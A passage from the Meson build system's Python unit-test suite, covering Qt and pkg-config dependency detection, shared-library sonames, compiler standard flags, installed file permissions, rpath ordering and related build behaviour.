self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
